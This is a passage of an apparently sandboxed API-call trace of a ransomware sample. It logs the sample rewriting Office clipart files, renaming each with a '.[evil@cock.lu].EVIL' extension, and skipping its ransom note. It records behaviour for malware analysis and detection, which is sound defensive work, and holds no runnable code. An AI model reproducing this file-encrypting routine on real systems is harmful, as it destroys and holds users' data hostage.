dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.310] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4844, lpOverlapped=0x0) returned 1 [0146.313] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.313] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.313] _errno () returned 0x84b1160840 [0146.313] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.313] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x4860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4860, lpOverlapped=0x0) returned 1 [0146.313] CloseHandle (hObject=0x1a8) returned 1 [0146.313] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.313] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.313] __uncaught_exception () returned 0x84b1160800 [0146.313] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.314] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf.[evil@cock.lu].evil")) returned 1 [0146.314] ??_V@YAXPEAX@Z () returned 0x1 [0146.317] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF", dwFileAttributes=0x200) returned 0 [0146.317] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.337] wcsstr (_Str="J0151055.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.337] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF") returned 69 [0146.337] wcscmp (_String1="J0151055.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.337] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0151055.WMF") returned 0x0 [0146.337] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF") returned 0x45 [0146.337] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151055.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.339] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3928, lpOverlapped=0x0) returned 1 [0146.386] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.386] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.386] _errno () returned 0x84b1160840 [0146.386] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.386] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x3940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3940, lpOverlapped=0x0) returned 1 [0146.386] CloseHandle (hObject=0x1a8) returned 1 [0146.386] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.387] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.387] __uncaught_exception () returned 0x84b1160800 [0146.387] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.387] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151055.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151055.wmf.[evil@cock.lu].evil")) returned 1 [0146.388] ??_V@YAXPEAX@Z () returned 0x1 [0146.390] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF", dwFileAttributes=0x200) returned 0 [0146.391] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.391] wcsstr (_Str="J0151061.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.391] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 69 [0146.391] wcscmp (_String1="J0151061.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.391] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0151061.WMF") returned 0x0 [0146.391] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 0x45 [0146.391] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.392] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a60, lpOverlapped=0x0) returned 1 [0146.435] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.435] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.435] _errno () returned 0x84b1160840 [0146.435] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.435] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a80, lpOverlapped=0x0) returned 1 [0146.435] CloseHandle (hObject=0x1a8) returned 1 [0146.435] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.435] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.436] __uncaught_exception () returned 0x84b1160800 [0146.436] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.436] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf.[evil@cock.lu].evil")) returned 1 [0146.440] ??_V@YAXPEAX@Z () returned 0x1 [0146.443] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF", dwFileAttributes=0x200) returned 0 [0146.443] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.443] wcsstr (_Str="J0151063.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.443] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF") returned 69 [0146.443] wcscmp (_String1="J0151063.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.443] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0151063.WMF") returned 0x0 [0146.443] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF") returned 0x45 [0146.443] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151063.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.445] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2988, lpOverlapped=0x0) returned 1 [0146.464] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.464] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.464] _errno () returned 0x84b1160840 [0146.464] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.464] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x29a0, lpOverlapped=0x0) returned 1 [0146.464] CloseHandle (hObject=0x1a8) returned 1 [0146.465] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.465] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.465] __uncaught_exception () returned 0x84b1160800 [0146.465] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.465] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151063.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151063.wmf.[evil@cock.lu].evil")) returned 1 [0146.466] ??_V@YAXPEAX@Z () returned 0x1 [0146.469] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF", dwFileAttributes=0x200) returned 0 [0146.469] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.469] wcsstr (_Str="J0151067.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.469] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 69 [0146.469] wcscmp (_String1="J0151067.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.469] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0151067.WMF") returned 0x0 [0146.469] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 0x45 [0146.469] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.471] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3394, lpOverlapped=0x0) returned 1 [0146.495] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.495] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.495] _errno () returned 0x84b1160840 [0146.495] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.495] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x33a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x33a0, lpOverlapped=0x0) returned 1 [0146.495] CloseHandle (hObject=0x1a8) returned 1 [0146.495] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.496] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.496] __uncaught_exception () returned 0x84b1160800 [0146.496] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.496] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf.[evil@cock.lu].evil")) returned 1 [0146.497] ??_V@YAXPEAX@Z () returned 0x1 [0146.500] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF", dwFileAttributes=0x200) returned 0 [0146.500] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.500] wcsstr (_Str="J0151073.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.500] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF") returned 69 [0146.500] wcscmp (_String1="J0151073.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.500] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0151073.WMF") returned 0x0 [0146.500] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF") returned 0x45 [0146.500] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151073.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.502] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3418, lpOverlapped=0x0) returned 1 [0146.522] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.522] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.522] _errno () returned 0x84b1160840 [0146.522] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.522] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x3420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3420, lpOverlapped=0x0) returned 1 [0146.522] CloseHandle (hObject=0x1a8) returned 1 [0146.523] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.523] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.523] __uncaught_exception () returned 0x84b1160800 [0146.523] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.523] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151073.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151073.wmf.[evil@cock.lu].evil")) returned 1 [0146.524] ??_V@YAXPEAX@Z () returned 0x1 [0146.527] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF", dwFileAttributes=0x200) returned 0 [0146.527] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.527] wcsstr (_Str="J0151581.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.527] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 69 [0146.527] wcscmp (_String1="J0151581.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.527] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0151581.WMF") returned 0x0 [0146.527] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 0x45 [0146.527] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.529] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a00, lpOverlapped=0x0) returned 1 [0146.535] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.535] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.535] _errno () returned 0x84b1160840 [0146.535] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.535] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x2a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2a20, lpOverlapped=0x0) returned 1 [0146.535] CloseHandle (hObject=0x1a8) returned 1 [0146.535] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.535] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.535] __uncaught_exception () returned 0x84b1160800 [0146.535] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.536] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf.[evil@cock.lu].evil")) returned 1 [0146.536] ??_V@YAXPEAX@Z () returned 0x1 [0146.539] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF", dwFileAttributes=0x200) returned 0 [0146.539] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.539] wcsstr (_Str="J0152414.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.539] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF") returned 69 [0146.539] wcscmp (_String1="J0152414.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.539] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152414.WMF") returned 0x0 [0146.539] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF") returned 0x45 [0146.539] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152414.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.541] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x610c, lpOverlapped=0x0) returned 1 [0146.563] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.563] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.564] _errno () returned 0x84b1160840 [0146.564] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.564] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x6120, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6120, lpOverlapped=0x0) returned 1 [0146.564] CloseHandle (hObject=0x1a8) returned 1 [0146.564] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.564] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.564] __uncaught_exception () returned 0x84b1160800 [0146.564] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.564] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152414.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152414.wmf.[evil@cock.lu].evil")) returned 1 [0146.565] ??_V@YAXPEAX@Z () returned 0x1 [0146.568] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF", dwFileAttributes=0x200) returned 0 [0146.568] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.568] wcsstr (_Str="J0152430.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.568] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 69 [0146.568] wcscmp (_String1="J0152430.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.568] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152430.WMF") returned 0x0 [0146.568] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 0x45 [0146.568] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.570] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3734, lpOverlapped=0x0) returned 1 [0146.620] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.620] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.620] _errno () returned 0x84b1160840 